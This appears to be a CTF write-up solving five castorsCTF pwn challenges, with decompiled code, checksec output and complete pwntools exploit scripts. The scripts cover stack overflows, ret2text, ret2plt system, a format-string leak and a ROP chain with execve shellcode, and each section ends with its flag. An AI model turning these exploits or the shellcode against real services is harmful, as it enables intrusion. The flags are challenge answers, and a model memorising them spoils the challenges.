abcbof
Description:
nc chals20.cybercastors.com 14424
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000)
main 函数如下:
/* Decompiled main of abcbof (IDA output, reformatted one statement per line).
 * Both locals are stack buffers; the [rsp/rbp] annotations are IDA's. */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    char v4; // [rsp+0h] [rbp-110h]   -- gets() writes here with no length bound
    char s2; // [rsp+100h] [rbp-10h]  -- compared below; the program never writes to it itself
    printf("Hello everyone, say your name: ", argv, envp);
    gets(&v4);
    /* s2 starts 0x100 bytes above v4 in the same frame, so it only holds
     * attacker-chosen data when the gets() input overruns v4. */
    if ( !strcmp("CyberCastors", &s2) )
        get_flag();
    puts("You lose!");
    return 0;
}
get_flag 函数如下:
/* Decompiled get_flag (IDA output, reformatted): copies flag.txt to stdout
 * one byte at a time and then exits the process; never returns. */
void __noreturn get_flag()
{
    char v0; // [rsp+7h] [rbp-9h]
    FILE *stream; // [rsp+8h] [rbp-8h]
    stream = fopen("flag.txt", "r");
    if ( !stream )
        exit(1);
    while ( 1 )
    {
        /* fgetc() returns an int, but it is stored in a char: on a platform
         * where char is signed (amd64 Linux) a 0xFF data byte compares equal
         * to -1 and ends the loop early. Harmless for a text flag. */
        v0 = fgetc(stream);
        if ( v0 == -1 )
            break;
        putchar(v0);
    }
    fclose(stream);
    exit(0);
}
解题思路:
覆盖变量漏洞
exp 如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * debug = 1 context(arch='amd64', endian='el', os='linux') context.log_level = 'debug' if debug == 1: p = process(['./chall']) else: p = remote('chals20.cybercastors.com', 14424) pd = '\x00' * 0x100 pd += 'CyberCastors' p.sendlineafter('name: ', pd) p.interactive()
Flag:
castorsCTF{b0f_4r3_n0t_th4t_h4rd_or_4r3_th3y?}
babybof1
Description:
nc chals20.cybercastors.com 14425
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments
main 函数如下:
/* Decompiled main of babybof1 (IDA output, reformatted). */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    char v4; // [rsp+0h] [rbp-100h]  -- 0x100 bytes below the saved rbp
    puts("Welcome to the cybercastors Babybof");
    printf("Say your name: ", argv);
    /* Unbounded read into a fixed-size stack buffer; checksec reports no
     * stack canary for this binary, so nothing detects the overrun. */
    return gets(&v4);
}
get_flag 函数如下:
/* Decompiled get_flag (IDA output, reformatted): copies flag.txt to stdout
 * one byte at a time and then exits the process; never returns. */
void __noreturn get_flag()
{
    char v0; // [rsp+7h] [rbp-9h]
    FILE *stream; // [rsp+8h] [rbp-8h]
    stream = fopen("flag.txt", "r");
    if ( !stream )
        exit(1);
    while ( 1 )
    {
        /* fgetc() returns an int, but it is stored in a char: on a platform
         * where char is signed (amd64 Linux) a 0xFF data byte compares equal
         * to -1 and ends the loop early. Harmless for a text flag. */
        v0 = fgetc(stream);
        if ( v0 == -1 )
            break;
        putchar(v0);
    }
    fclose(stream);
    exit(0);
}
解题思路:
ret2text 没啥说的
exp 如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * debug = 1 context(arch='amd64', endian='el', os='linux') context.log_level = 'debug' if debug == 1: p = process(['./chall']) else: p = remote('chals20.cybercastors.com', 14425) elf = ELF('./chall', checksec=False) addr_get_flag = elf.sym['get_flag'] pd = '\x00' * 0x108 pd += p64(addr_get_flag) p.sendlineafter('name: ', pd) p.interactive()
Flag:
castorsCTF{th4t's_c00l_but_c4n_y0u_g3t_4_sh3ll_n0w?}
babybof2
Description:
nc chals20.cybercastors.com 14434
Solution:
程序保护如下:
Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments
main 函数如下:
/* Decompiled main of babybof2 (IDA output, reformatted). All input handling
 * happens in start(); main never calls winnersLevel() itself. */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    puts("Do you really think you can get to the winners table?");
    puts("I'll give you one shot at it, what floor is the table at: ");
    start();
    puts("Yeah that's what I thougt, LOL.\n");
    return 0;
}
start 函数如下:
/* Decompiled start (IDA output, reformatted): reads one line with gets()
 * into a stack buffer IDA places at [ebp-48h] and returns gets()'s result.
 * The read has no length bound. */
char *start()
{
    char s; // [esp+0h] [ebp-48h]
    return gets(&s);
}
winnersLevel 函数如下:
/* Decompiled winnersLevel (IDA output, reformatted). Returns 1 and prints the
 * flag via system() when a1 is 386 or 258, otherwise prints a refusal and
 * returns 0. Neither main() nor start() calls it in the listing above. */
signed int __cdecl winnersLevel(int a1)
{
    signed int result; // eax
    if ( a1 != 386 && a1 != 258 )
    {
        puts("You guessed right but it seems your badge number isn't on our list.");
        result = 0;
    }
    else
    {
        puts("Wow! Please excuse me sir I had no idea...here are your chips");
        /* Shells out through system(); this import is what links system()
         * into the binary's PLT. */
        system("cat ./flag.txt");
        result = 1;
    }
    return result;
}
解题思路:
直接 plt_system 加参数读取 flag 就完事
exp 如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * debug = 1 context(arch='i386', endian='el', os='linux') context.log_level = 'debug' if debug == 1: p = process(['./chall']) else: p = remote('chals20.cybercastors.com', 14434) elf = ELF('./chall', checksec=False) plt_system = elf.plt['system'] addr_flag = 0x0804A046 # gdb.attach(p, "b *0x08049228\nc") pd = 'a' * 0x4c pd += p32(plt_system) pd += p32(0) pd += p32(addr_flag) p.sendline(pd) p.interactive()
Flag:
castorsCTF{b0F_s_4r3_V3rry_fuN_4m_l_r1ght}
babyfmt
Description:
nc chals20.cybercastors.com 14426
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled
main 函数如下:
/* Decompiled main of babyfmt (IDA output, reformatted). The flag and the
 * user's input share one stack frame; offsets are IDA's. */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    FILE *stream; // [rsp+8h] [rbp-218h]
    char v5; // [rsp+10h] [rbp-210h]   -- flag buffer, 0x100 bytes below s
    char s; // [rsp+110h] [rbp-110h]   -- user input buffer
    unsigned __int64 v7; // [rsp+218h] [rbp-8h]  -- stack canary (checksec: Canary found)
    v7 = __readfsqword(0x28u);
    stream = fopen("flag.txt", "r");
    if ( !stream )
        exit(1);
    /* "%s" with no field width: correct only while flag.txt is shorter than v5. */
    __isoc99_fscanf(stream, "%s", &v5);
    fclose(stream);
    printf("Hello everyone, this is babyfmt! say something: ");
    /* NOTE(review): IDA labels the stream argument _bss_start; presumably stdin -- confirm. */
    fgets(&s, 255, _bss_start);
    /* The user-supplied line is passed as the format string itself; the flag
     * in v5 sits in the same frame, which is the leak the writeup describes. */
    printf(&s, 255LL);
    return 0;
}
解题思路:
不知道为啥远程还有 \r,本地和远程脚本反正不是很一样
这题拿 %lx 泄露字符串就行
exp 如下:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Solve script for babyfmt. Python 2 syntax (print statement). debug is 2 here,
# so it connects to the remote host from the Description; set debug = 1 to run
# ./chall locally.
# NOTE(review): arch='i386' does not match the amd64 binary reported by
# checksec; it has no effect here because nothing is assembled.
from pwn import *
import binascii

debug = 2
context(arch='i386', endian='el', os='linux')
context.log_level = 'debug'
if debug == 1:
    p = process(['./chall'])
else:
    p = remote('chals20.cybercastors.com', 14426)

# One '%N$lx' read per stack slot 8..15, separated by '.tmp' markers so the
# reply can be split again below.
pd = ''
for i in range(8, 0x10):
    pd += '%' + str(i) + '$lx.tmp'
p.sendline(pd)
# The remote terminates lines with CRLF (see the Solution note), hence '\r\n'.
p.recvuntil('tmp\r\n')
res = []
for i in range(0, 8):
    # Each field is a little-endian 8-byte word printed as hex: left-pad to 16
    # digits, decode, then reverse the byte order.
    res.append(binascii.unhexlify(p.recvuntil('.tmp')[:-4].rjust(0x10, '0'))[::-1])
print ''.join(res)
p.interactive()
Flag:
castorsCTF{l34k_l34k_th4t_f0rm4t_str1n6_l34k}
babybof1 pt2
Description:
nc chals20.cybercastors.com 14425
Solution:
程序保护如下:
Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments
main 函数如下:
/* Decompiled main of babybof1 (IDA output, reformatted); same binary as the
 * babybof1 section. */
int __cdecl main(int argc, const char **argv, const char **envp)
{
    char v4; // [rsp+0h] [rbp-100h]  -- 0x100 bytes below the saved rbp
    puts("Welcome to the cybercastors Babybof");
    printf("Say your name: ", argv);
    /* Unbounded read into a fixed-size stack buffer; checksec reports no
     * stack canary for this binary, so nothing detects the overrun. */
    return gets(&v4);
}
get_flag 函数如下:
/* Decompiled get_flag (IDA output, reformatted): copies flag.txt to stdout
 * one byte at a time and then exits the process; never returns. Unused by
 * the pt2 solution, which aims for a shell instead. */
void __noreturn get_flag()
{
    char v0; // [rsp+7h] [rbp-9h]
    FILE *stream; // [rsp+8h] [rbp-8h]
    stream = fopen("flag.txt", "r");
    if ( !stream )
        exit(1);
    while ( 1 )
    {
        /* fgetc() returns an int, but it is stored in a char: on a platform
         * where char is signed (amd64 Linux) a 0xFF data byte compares equal
         * to -1 and ends the loop early. Harmless for a text flag. */
        v0 = fgetc(stream);
        if ( v0 == -1 )
            break;
        putchar(v0);
    }
    fclose(stream);
    exit(0);
}
解题思路:
前面那个 flag 说你要尝试拿到 shell,那这道题的 get_flag 函数就没啥用了
ret2libc 好像一开始可以,后来主办方貌似禁了,用 ret2shellcode 也可
exp 如下:
#!/usr/bin/env python # -*- coding: utf-8 -*- from pwn import * debug = 2 context(arch='amd64', endian='el', os='linux') context.log_level = 'debug' if debug == 1: p = process(['./chall']) else: p = remote('chals20.cybercastors.com', 14425) elf = ELF('./chall', checksec=False) plt_gets = elf.plt['gets'] addr_bss = elf.bss() addr_rop1 = elf.search(asm("pop rdi;ret")).next() pd = '\x00' * 0x108 pd += p64(addr_rop1) pd += p64(addr_bss) pd += p64(plt_gets) pd += p64(addr_bss) # gdb.attach(p, "b *0x40078B\nc") p.sendlineafter('Babybof\r\n', pd) pd = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05" p.sendline(pd) p.interactive()
Flag:
castorsCTF{w0w_U_jU5t_h4ck3d_th15!!1_c4ll_th3_c0p5!11}